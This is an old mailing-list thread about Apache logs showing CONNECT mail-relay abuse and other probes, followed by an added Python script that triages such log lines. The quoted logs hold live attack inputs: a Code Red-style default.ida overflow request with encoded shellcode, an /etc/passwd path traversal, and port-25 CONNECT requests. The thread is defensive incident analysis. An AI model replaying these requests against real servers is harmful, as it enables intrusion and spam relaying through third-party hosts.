Re: Strange CONNECT entries in apache logs

From: OSCAR (oscar7890_at_hotmail.com)
Date: 06/11/03

    Date: Tue, 10 Jun 2003 23:51:49 -0500
    To: BBDO Perú Lima <agencia@bbdoperu.com>
    
    

    If 200 is a successful connection, do these lines mean I am in
    trouble?...

    200.48.211.58 - - [10/Jun/2003:10:23:21 -0500] "GET
    /
    default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
    90%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
    78%u0000%u00=a HTTP/1.0" 200 -

    21.10.41.230 - - [07/Jun/2003:09:34:20 -0500] "GET
    http://www.nessus.org HTTP/1.0" 200 2347

    21.10.41.230 - - [07/Jun/2003:09:32:49 -0500] "TRACE
    /thisFiledoesNotexist.html HTTP/1.1" 200 319

    21.10.41.230 - - [07/Jun/2003:09:32:43 -0500] "GET /%2e/ HTTP/1.1" 200
    2347

    21.10.41.230 - - [07/Jun/2003:09:32:48 -0500] "OPTIONS * HTTP/1.0" 200 -

    21.10.41.230 0 - - [07/Jun/2003:09:32:16 -0500] "GET
    /index.php?page=../../../../../../../../../../../../../../../etc/passwd
    HTTP/1.1" 200 38508

    21.10.41.230 - - [07/Jun/2003:09:32:14 -0500] "GET /?sql_debug=1
    HTTP/1.1" 200 2347

    21.10.41.230 - - [07/Jun/2003:09:31:42 -0500] "GET
    ///////////////////////////////////////////////////////////////////////
    ///////////////////////////////////////////////////////////////////////
    ///////////////////////////////////////////////////////////////////////
    ///////////////////////////////////////////////////////////////////////
    ///////////////////////////////////////////////////////////////////////
    /////////////// HTTP/1.1" 200 2347

    21.10.41.230 - - [07/Jun/2003:09:31:30 -0500] "GET /?Mode=debug
    HTTP/1.1" 200 2347

    212.253.114.134 - - [17/May/2003:15:34:11 -0500] "HEAD / HTTP/1.0" 200 0

    Thanks.

    -------
    Oscar

    On Monday, Jun 9, 2003, at 15:34 America/Lima, Christine Kronberg wrote:

    > On Fri, 6 Jun 2003, Rajkumar S wrote:
    >
    >>
    >> While going through my apache logs, I found some logs indicating CONNECT
    >> requests to port 25 of other hosts.
    >>
    >> 213.130.24.192 [06/Jun/2003:08:44:58 +0530] "CONNECT 194.67.23.20:25
    >> HTTP/1.1" 302 5 "-" "-"
    >> 130.94.247.248 [06/Jun/2003:10:26:17 +0530] "CONNECT 207.44.188.67:25
    >> HTTP/1.0" 200 14409 "-" "-"
    >> 130.94.247.248 [06/Jun/2003:09:56:21 +0530] "CONNECT smtp.rol.ru:25
    >> HTTP/1.0" 200 17757 "-" "-"
    >>
    >> I found this in 2 machines in an Indian IP block. My other server in the
    >> US is not affected by this. Someone else seeing this? Could this be the
    >> next wave of spam ??
    >
    > Some people are using your apache as a mail relay. Did you enable
    > proxying? Getting a "200" indicates that the connect to those
    > mailservers was successful. Make sure that you configure your
    > apache not to accept CONNECTs from everywhere to other than
    > special ports, if you need proxying at all (if you don't need
    > it disable that feature).
    > I see people trying to connect to other servers each day, but
    > they get a "405" error.
    >
    > Cheers,
    >
    >
    >
    > Chris.
    >
    > --
    > GeNUA mbH
    >
    >
    >
    >
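The distinction drawn in the quoted reply (a CONNECT answered with "200" versus one answered with "405"), as an added triage script that is not part of the original thread: it flags CONNECT and absolute-URI requests that received a 2xx status and groups them by client. The first five sample lines are re-joined from the log excerpts quoted in this thread, the sixth is constructed, and the names `classify` and `review_queue` are illustrative.

```python
import re
from collections import namedtuple

Hit = namedtuple("Hit", "ip kind target status smtp needs_review")

# Matches both layouts quoted in the thread: common log format
# (ip - - [ts] "req" status size) and the shorter ip [ts] "req" status size.
LINE = re.compile(
    r'^(?P<ip>\S+) .*?\[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

def classify(line):
    """Return a Hit for proxy-style requests (CONNECT or absolute URI), else None."""
    m = LINE.match(line.strip())
    if not m:
        return None
    target, status = m["target"], int(m["status"])
    if m["method"] == "CONNECT":
        kind = "connect"
    elif re.match(r"[A-Za-z][A-Za-z0-9+.-]*://", target):
        kind = "absolute-uri"
    else:
        return None
    # Port 25 targets are the mail-relay pattern discussed in the thread.
    smtp = kind == "connect" and target.rsplit(":", 1)[-1] == "25"
    return Hit(m["ip"], kind, target, status, smtp, 200 <= status < 300)

def review_queue(lines):
    """Group 2xx proxy-style requests by client so each source can be checked."""
    queue = {}
    for hit in filter(None, map(classify, lines)):
        if hit.needs_review:
            queue.setdefault(hit.ip, []).append(hit.target)
    return queue

# Lines 1-5 re-joined from the thread; line 6 is constructed (documentation IPs).
SAMPLE = [
    '213.130.24.192 [06/Jun/2003:08:44:58 +0530] "CONNECT 194.67.23.20:25 HTTP/1.1" 302 5 "-" "-"',
    '130.94.247.248 [06/Jun/2003:10:26:17 +0530] "CONNECT 207.44.188.67:25 HTTP/1.0" 200 14409 "-" "-"',
    '130.94.247.248 [06/Jun/2003:09:56:21 +0530] "CONNECT smtp.rol.ru:25 HTTP/1.0" 200 17757 "-" "-"',
    '21.10.41.230 - - [07/Jun/2003:09:34:20 -0500] "GET http://www.nessus.org HTTP/1.0" 200 2347',
    '21.10.41.230 - - [07/Jun/2003:09:32:48 -0500] "OPTIONS * HTTP/1.0" 200 -',
    '192.0.2.10 - - [10/Jun/2003:12:00:00 -0500] "CONNECT 198.51.100.7:25 HTTP/1.0" 405 312',
]

if __name__ == "__main__":
    for ip, targets in review_queue(SAMPLE).items():
        print(ip, "->", ", ".join(targets))
```

Each flagged client is a lead to check against the server's proxy configuration; the status code alone does not show what was returned to the client.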
